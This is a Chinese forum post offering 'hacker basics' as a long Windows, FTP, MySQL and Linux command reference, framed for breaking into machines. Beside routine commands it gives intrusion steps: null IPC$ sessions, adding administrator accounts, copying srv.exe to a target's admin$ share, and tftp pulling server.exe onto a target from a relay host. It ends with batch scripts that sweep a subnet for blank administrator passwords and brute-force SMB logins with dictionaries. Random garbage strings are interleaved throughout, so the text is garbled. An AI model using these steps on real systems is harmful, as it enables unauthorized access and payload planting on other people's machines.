黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
& c1 T- `% j- q* Q: Enet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 - M/ B- Z- l6 ~$ S* b
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: : D4 k* f7 B/ b8 x
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
4 G; T( K1 U8 ]: H7 Ynet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 + U4 y0 T" G) U  ]* z: K
net use h: /del 删除映射对方到本地的为H:的映射 6 {: ^, @' q/ F3 u0 }( U
net user 用户名　密码　/add 建立用户
% K$ ^6 k3 ?& v3 x: Dnet user guest /active:yes 激活guest用户
) ]0 j1 x' R( enet user 查看有哪些用户 6 O9 O  A4 i. J0 ^6 ?+ R) i0 L
net user 帐户名 查看帐户的属性 8 X4 z" D  ^- F
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 6 u  L0 K) v6 _$ r9 [: e- {0 u, G- v
net start 查看开启了哪些服务
' Z: {) ~/ j; b/ X$ j/ Tnet start 服务名　 开启服务；(如:net start telnet， net start schedule)
% \% M4 d: U4 M. E6 Mnet stop 服务名 停止某服务
) b- D3 u9 Z/ [0 |) Hnet time \\目标ip 查看对方时间 4 j% b' e4 ?  ^1 ^6 O5 u
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
3 Y0 n5 H) h3 v: `/ y  h& qnet view 查看本地局域网内开启了哪些共享 5 M4 N# H5 p$ g4 {
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
$ g. j* |" m7 ^5 c6 z  m' v3 Nnet config 显示系统网络设置
# B8 r! p) T$ S. R3 V) `net logoff 断开连接的共享 1 ?' B: M. K' L( e" K8 A: P
net pause 服务名 暂停某服务 1 m3 m7 O- H( H2 S8 w
net send ip "文本信息" 向对方发信息
* W9 V1 t+ p4 d0 r- k; nnet ver 局域网内正在使用的网络连接类型和信息 2 P+ q! f6 D$ L
net share 查看本地开启的共享
% u2 H: T# F$ a8 ^net share ipc$ 开启ipc$共享
3 B& t- D+ R2 \# m( U* S6 }net share ipc$ /del 删除ipc$共享
1 y! y+ N8 R9 t* u" inet share c$ /del 删除C：共享
7 x2 |4 ?0 w: Z7 `$ j- Znet user guest 12345 用guest用户登陆后用将密码改为12345 2 q, q) D  i5 l% v5 W* T: R
net password 密码 更改系统登陆密码
" u% \$ R& C: y& u6 L; C5 m9 gnetstat -a 查看开启了哪些端口,常用netstat -an
( d# P0 S( F( S1 \2 M6 Y4 `7 Xnetstat -n 查看端口的网络连接情况，常用netstat -an
5 V. R+ |- Q: i; e# m& znetstat -v 查看正在进行的工作 6 K8 a6 p( i/ _. S# s8 Y2 c
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
+ d; \$ F3 N1 E& B3 V" Y( W. Hnetstat -s 查看正在使用的所有协议使用情况 ' z; x. f# o5 c# t) a9 e3 V- `3 _
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 ; D! r  x! Z$ T8 T3 h/ Y' o/ W
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 . [4 j, E; I# P' j- H8 a$ ?2 W/ ?
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
# B* w! e0 Y1 ]" W' jping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
1 I' {1 t) X8 oipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
; m9 r: n. K3 x3 s: Jtlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
& f/ I8 U( E# e& g! {8 ^' c$ V2 ~kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)   A/ ?; x$ o" c. s& d- p
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 - O) O2 y' B* G# D! b
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
) v; Y+ ?7 C, c! O* j# f7 Zmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 0 A* K  i" l, h' W+ E6 h
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 + Y* E  e1 u% E" Q0 j# ]& ?3 d5 W. o
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
! o! O2 _! I& xat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
4 f! E) D! m6 h! |2 q2 f: {at id号 /delete 停止某个已注册的计划任务
2 x3 a- G, ?: u4 L6 @0 N2 Fat 查看所有的计划任务 # A. I! y& O' M/ B3 o
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 / R! I& H9 W7 h7 p. j+ ?2 K. [
finger username @host 查看最近有哪些用户登陆 ( \% o3 {+ w1 w) }0 e" z2 S1 A
telnet ip 端口 远和登陆服务器,默认端口为23
- J& ^/ [6 y/ M- Qopen ip 连接到IP（属telnet登陆后的命令）
3 ~$ A1 V' n( s4 \telnet 在本机上直接键入telnet 将进入本机的telnet
! c! }) @' u! D3 Fcopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
2 |0 j1 c- U7 {4 a- n4 Ecopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 5 q, x8 ~8 w& L! h, E4 ~
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
0 M5 y- A* q% j3 Tcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： 5 y+ H6 C! Y, W6 {% z4 Q
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
$ m2 ~* q2 H9 a3 Z. i+ u) M8 Jtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 ! k9 @, n" z% u+ A& h
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
2 u$ `- Y7 o2 r; X" s9 Cftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
( w# i+ A- z, h" yroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface % {9 e6 M/ l0 H# S2 N3 c1 ~
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 : R( \: h: O& ]* ?
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 * ?" j3 M3 f* x  \5 R4 L
mem 查看cpu使用情况   A7 v+ y* Y, ?3 N
attrib 文件名(目录名) 查看某文件（目录）的属性
! g1 V0 w, |" X, P2 Fattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 ' r2 J6 h8 H3 @* F3 n. d9 m
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
: D( V. f) F: |date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
3 P" s5 `" Y2 G7 Cset 指定环境变量名称=要指派给变量的字符 设置环境变量 ; N8 R3 M' l! Y# s
set 显示当前所有的环境变量
0 [7 M% z5 A1 Q0 o6 B% j' u0 ?: Q  |set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
1 ~& d! x( a. p$ Bpause 暂停批处理程序，并显示出：请按任意键继续....
) ~2 J/ D: o! m8 _5 \if 在批处理程序中执行条件处理（更多说明见if命令及变量） 1 l6 `1 o$ J4 z, H
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
3 B( o# @" d, N; e, Zcall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
) t( r: d7 l1 p) Ifor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） $ D' X+ _% X  g
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 ! A. m* J/ _  p* s# {; s
echo 信息 在屏幕上显示出信息   q3 d0 Z* w) M$ e( j
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
* j7 |5 i' U1 lfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 0 ]6 B1 I7 W% ^" f: J) @
find 文件名 查找某文件
2 T* J7 ]1 r1 c; H& R9 T1 |$ F/ Ktitle 标题名字 更改CMD窗口标题名字 1 n7 T- z2 T6 k2 \
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 8 W2 i' [2 j% O5 z
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) ! J$ T, `; s( s- l2 f
print 文件名 打印文本文件 ' U% j4 ^6 d8 J# G2 W
ver 在DOS窗口下显示版本信息
1 D* v2 b- |+ owinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）   x( \8 |5 e: {/ ?
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS - \9 K; n7 A% G8 e4 T/ j0 l
md　目录名 创建目录
9 p) ^8 l; [8 q2 `; i* L6 Hreplace 源文件　要替换文件的目录 替换文件
+ [. S0 ^9 J* @% i! S  z' cren 原文件名　新文件名 重命名文件名 ) [: W2 o6 G1 Y- h2 f* i
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 4 ^- L+ h! K5 ?* n" e4 Y$ f8 D0 T5 ^
type 文件名 显示文本文件的内容 0 R# f, h$ U) [+ W" i
more 文件名 逐屏显示输出文件
" X/ h* h; Q5 f# g# m( Mdoskey 要锁定的命令＝字符
* K0 D1 n' P6 d  A4 O. {doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= + d) j5 s5 n  j: O  ]
taskmgr 调出任务管理器 2 e. e4 m" @3 J" P# q' {$ {
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 4 u$ O8 p2 G: r: Q3 Q$ Q
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
  e( L4 i0 w* j0 L7 p* l8 S% iexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
* A- s) i' j, ^6 i" c1 [path 路径\可执行文件的文件名 为可执行文件设置一个路径。
7 {5 g  M1 W  v3 ~cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
- _# i5 A# X- V: H7 Dregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； ' I6 i/ }4 e* D9 C/ `
regedit /e 注册表文件名 导出注册表
9 V  }5 _* q* Z; b& ucacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 7 I9 A) i! ?% ]" }# p6 h1 z$ @
cacls 文件名 查看文件的访问用户权限列表 ; y/ l" G  K% l4 Y
REM 文本内容 在批处理文件中添加注解
$ ]4 ^- q9 v2 k1 h% E3 ~9 Knetsh 查看或更改本地网络配置情况, p& p' j7 m5 ^0 L# Y$ Y# {
IIS服务命令：6 x$ N  W+ z2 i( [& y/ Z0 v
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
3 V- y6 u7 p% H6 l" `! iiisreset /start或stop 启动（停止）所有Internet服务
4 H3 C* N. V* v4 w4 [0 Q' ]iisreset /restart 停止然后重新启动所有Internet服务 $ g6 B- K. l# E# U
iisreset /status 显示所有Internet服务状态
! M+ |4 N; n  ]% W: uiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
3 |! R7 w% }: ]0 }  Q& J: T8 Liisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 2 V  f, M. y- l( k5 f$ |
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
+ w$ ~, o( g$ o% F2 a% ciisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 & L1 _1 _/ y0 r" \: }) o
FTP 命令： (后面有详细说明内容)
5 Z7 J1 |' ^7 B- S  Dftp的命令行格式为:, d, r; J6 f' s. e9 a9 M; L( m
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。8 R) o  D: F0 l) G3 F- d" P, V
－d 使用调试方式。 7 D% W$ |/ r, S: h# q1 f% `
－n 限制ftp的自动登录,即不使用.netrc文件。
/ `  T: R( r' i- V% v－g 取消全局文件名。
5 t. {- Y6 \" v& |# ahelp [命令] 或 ？[命令] 查看命令说明 - p- c; o! O9 H- s
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 2 f+ T! W$ s- X  }, M
pwd 列出当前远端主机目录 " @' n8 [+ S/ e% e
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
! ~: U5 |9 B0 B$ P+ m* P7 M* Gget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 + j( y0 R9 W- p/ y6 R. M/ Z
mget [remote-files] 从远端主机接收一批文件至本地主机
1 q, ?* ?; ]$ i7 y6 p7 \mput local-files 将本地主机中一批文件传送至远端主机
% Z9 |$ U0 _/ P1 Q8 m$ sdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 8 G) t) {9 |2 O4 c* Y0 Q: T
ascii 设定以ASCII方式传送文件(缺省值) / P# X, w9 J( D6 W8 A% j0 x
bin 或 image 设定以二进制方式传送文件
/ s# `) _) B5 F" C8 r! G$ hbell 每完成一次文件传送,报警提示
9 s$ H$ x, T9 G& n+ Ncdup 返回上一级目录 + l4 y7 l2 v# {' i: U( \- |8 }
close 中断与远程服务器的ftp会话(与open对应) ! }  o! f, l& ^$ K" }; ~9 }- q+ @
open host[port] 建立指定ftp服务器连接,可指定连接端口 0 @' L$ Y! C; F* \  j
delete 删除远端主机中的文件
. l, W7 w+ w4 ?. S5 g8 H: _; u6 ]0 Qmdelete [remote-files] 删除一批文件
0 w) }" J1 `+ C" A  s7 imkdir directory-name 在远端主机中建立目录
  h* b9 i, w7 s. t# K% I8 brename [from] [to] 改变远端主机中的文件名
7 J2 O2 r3 X) P/ G+ `/ I# E4 k) rrmdir directory-name 删除远端主机中的目录 * O7 W( C: ~& X! j5 k. [
status 显示当前FTP的状态 ( R6 v' m9 d  ?1 I2 B. v$ |- j
system 显示远端主机系统类型   `" j4 Q7 S( l: W$ ?8 \: S' w
user user-name [password] [account] 重新以别的用户名登录远端主机
! D; U8 ?1 z) B' E: t& [3 C/ ]open host [port] 重新建立一个新的连接 # o' Z4 N& A5 i, K) k
prompt 交互提示模式 + i# g+ D. T5 d/ ~$ k: c. r' l
macdef 定义宏命令
' M6 w8 K% |) D% j% }lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
% v4 g7 L" J% J7 `+ V: X6 wchmod 改变远端主机的文件权限
) \) V; X, T' f2 j( F( I3 `- s, tcase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 % K2 Y3 s. P& b) j3 ^! b
cd remote－dir 进入远程主机目录 . V( B* u& l4 a- h' y! I
cdup 进入远程主机目录的父目录 ! \. z! V  T2 S( @2 [# R3 \3 g
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip ) Y* a6 [3 M6 A& K
MYSQL 命令：
8 Z& n- j$ Q6 J! @5 vmysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。$ v$ |% S$ E3 u( A& Q+ s. L  c
（例：mysql -h110.110.110.110 -Uroot -P123456 * j* y* A  i; s  g4 K% K7 _. t
注:u与root可以不用加空格，其它也一样） ( z' U" X2 o: I( |
exit 退出MYSQL ) K0 v9 i- n4 u! m3 W" p7 C
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
" O% D* D* Y- M+ B# H5 Q1 vgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
! }0 `, A4 m8 {5 x+ Xshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
  l. N- A0 Q( B. D  p! G- e! huse mysql；" Q  d! i  ]( A! s) u9 B
show tables; 显示库中的数据表
5 l1 m3 `: V% n" ?, T% X9 Odescribe 表名; 显示数据表的结构
( P* g* v9 C8 qcreate database 库名; 建库
# b9 H4 n8 y/ D1 z; z. {; c9 k6 Quse 库名；; R" w2 q( B4 [& p. `, y
create table 表名 (字段设定列表)； 建表 . M' p. g( O# {1 P" R7 D
drop database 库名;
* T3 u; j& C) k8 Z( f: ?drop table 表名； 删库和删表
% p3 `/ g- r% y$ ]( y+ F+ Qdelete from 表名; 将表中记录清空
+ o" U2 _! S6 F) bselect * from 表名; 显示表中的记录 / e) Y) p% j9 e( h1 @
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 & ^: I3 s2 D' S$ o
win2003系统下新增命令（实用部份）：
5 c! V) x% F5 S7 A: zshutdown /参数 关闭或重启本地或远程主机。5 j& G5 Z. W1 {& }4 X. c; a; K8 v0 s
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。+ l& D- i, p$ A1 [. f7 ~
例：shutdown /r /t 0 立即重启本地主机（无延时）
  i# b, W# b% t! m" a$ utaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。, f( `, ]6 N. ]" x/ V; ]
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 2 E; O! Z7 N5 P  d/ i5 w2 y
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
; u( V- {' s2 O8 q% _7 p- n参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
, G4 d! |8 b' x/ o# u$ k3 _Linux系统下基本命令： 要区分大小写( ]3 q3 p' ]8 z! s+ `9 D( ^( O0 h9 g
uname 显示版本信息（同win2K的 ver） & B$ Z8 @3 [3 p! c
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
5 Q6 V& E4 ?- x& Ipwd 查询当前所在的目录位置
0 }/ `* l) a' r# x: pcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 & Y3 j- h! ]0 m+ m: e: a
cat 文件名 查看文件内容 2 O3 x8 j0 a0 g3 g8 @1 a+ _! q% I2 ]
cat >abc.txt 往abc.txt文件中写上内容。 7 O4 R+ }+ V) q4 G- E/ \1 I
more 文件名 以一页一页的方式显示一个文本文件。
' D0 ~. J, u9 s7 q% Vcp 复制文件
- [+ J- c- {. pmv 移动文件
# i6 P( G) q- y4 Grm 文件名 删除文件，rm -a 目录名删除目录及子目录
+ q7 t+ v+ l& zmkdir 目录名 建立目录 " ~  O  A5 F/ y' @) X# O/ @
rmdir 删除子目录，目录内没有文档。 $ |( o6 n  r6 `+ y# G
chmod 设定档案或目录的存取权限 5 {) c  r" o; ~) G+ y5 ^
grep 在档案中查找字符串
" M$ s! s3 J5 Ydiff 档案文件比较
: h  X; F, a: b7 z0 C+ v; M1 `find 档案搜寻
0 c$ U+ G/ p# p* I5 i" gdate 现在的日期、时间   C) n' ?0 {9 p; ~4 O1 Y, Z
who 查询目前和你使用同一台机器的人以及Login时间地点
3 L, Q/ D) _4 B$ ]$ T' `: M1 }w 查询目前上机者的详细资料
' M, o# I( F- }4 P! wwhoami 查看自己的帐号名称   }9 R( z4 o7 N! ?  v2 x' Q
groups 查看某人的Group 4 S0 `% q% C- j2 I; T6 c9 u3 A9 h8 {
passwd 更改密码 ; ?, C) D0 k2 j3 b
history 查看自己下过的命令 6 F+ `5 `; A3 `: ?# @. c! s! a5 g
ps 显示进程状态 2 A! s; b( [/ C1 G' i: k
kill 停止某进程 3 m" k" r% m- b( g. u7 Z% X% f
gcc 黑客通常用它来编译C语言写的文件 8 ?8 O- k( H5 s5 o! O6 t5 b- Q, e
su 权限转换为指定使用者
- I3 {" p6 z' R) Ytelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。   t) F: O  i( Z; K
ftp ftp连接上某服务器（同win2K
$ A8 L  y7 u+ _附：批处理命令与变量
) d2 H" ^- r7 o& R; s, d1：for命令及变量 基本格式： ) Q# A7 s6 O5 L" z
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
2 v1 {1 w4 x# I1 A2 h批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%30 _3 B' x% V) t: u: _7 }8 K
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
8 |6 ~& g! Z7 K+ X2 Q! U* Scommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开/ b; M" G# B& X$ o5 [
command_parameters：为特定命令指定参数或命令行开关" O7 @* }. q6 R2 q. l
IN (set)：指在(set)中取值；DO command ：指执行command
, Q+ o0 T0 e$ F& W9 B) U6 n& T/ }参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 / U- c) v& P: C5 K# f8 G8 O
用法举例： * v- s# k% x6 k& L$ S
@echo off 6 J4 A5 W, v7 N) ^
echo 用法格式：test.bat *.*.* > test.txt # d1 v! D0 a$ b( P. O+ ~
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt ) }. I% l0 i) k0 R; R
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
/ y) U5 C8 B  c+ P3 ^2 F/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 ! {& [" _9 B( s9 F0 Z
@echo off : m6 N1 O  u6 @4 i$ Q& n
echo 用法格式：ok.bat ip 0 ?; A' ]/ U  C  Y6 F9 X
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 5 o' p" [# ~! l0 Y/ x3 W9 R
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。# q$ f6 r3 [1 X2 e% J1 G
2：if命令及变量 基本格式： : x8 J1 C) \" a3 o8 |# E5 r
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
" n' Q; ]. D2 }2 {# o例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
+ {7 m: e4 u! U5 B  A; K; I5 p0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 . W& z: Q5 F9 d+ F1 f; }
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。9 N4 L$ N0 c$ M( K9 n
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
& M% r4 ]# K7 YIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
& k0 R7 l# j& }; X8 x! e/ K$ v例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
6 [' {0 P; G0 t- E9 M" t. _IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”